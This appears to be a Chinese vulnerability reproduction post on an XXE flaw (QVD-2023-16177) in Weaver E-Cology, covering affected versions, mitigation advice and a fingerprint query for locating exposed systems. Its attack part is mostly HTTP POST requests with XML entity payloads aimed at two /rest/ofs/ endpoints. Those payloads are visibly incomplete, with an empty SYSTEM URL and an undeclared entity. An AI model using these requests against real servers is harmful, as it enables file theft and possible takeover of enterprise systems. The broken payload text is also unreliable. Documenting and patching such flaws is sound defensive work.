700字范文,内容丰富有趣,生活中的好帮手!
700字范文 > 泛微E-Cology XXE漏洞复现(QVD--16177)

泛微E-Cology XXE漏洞复现(QVD--16177)

时间:2023-03-02 16:19:48

相关推荐

泛微E-Cology XXE漏洞复现(QVD--16177)

0x01 产品简介

泛微协同管理应用平台E-Cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。

0x02 漏洞概述

泛微e-cology某处功能点最初针对用户输入的过滤不太完善,导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过,本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件,甚至可能获取应用系统的管理员权限。

0x03 影响范围

泛微 EC 9.x 且补丁版本 < 10.58.2

泛微 EC 8.x 且补丁版本 < 10.58.2

0x04 复现环境

鹰图指纹:app.name="泛微 e-cology 9.0 OA"

0x05 漏洞复现

PoC

POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1Host: your-ipContent-Type: application/xml<M><syscode>&send;</syscode></M>

出现以上响应则存在漏洞

exp1

POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1Host: your-ipContent-Type: application/xml<?xml version="1.0" encoding="utf-8"?><!DOCTYPE syscode SYSTEM ""><M><syscode>&send;</syscode></M>

exp2

POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1Host: your-ipContent-Type: application/xml<?xml version="1.0" encoding="utf-8"?><!DOCTYPE syscode SYSTEM ""><M><syscode>&send;</syscode></M>

PS:区别在于漏洞路径不一样

验证:

0x06 修复建议

临时缓解方案

限制访问来源地址,如非必要,不要将系统开放在互联网上。

升级修复方案

目前官方已发布10.58.2来修复此漏洞,建议受影响用户更新至10.58.2:

/cs/securityDownload.html#

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。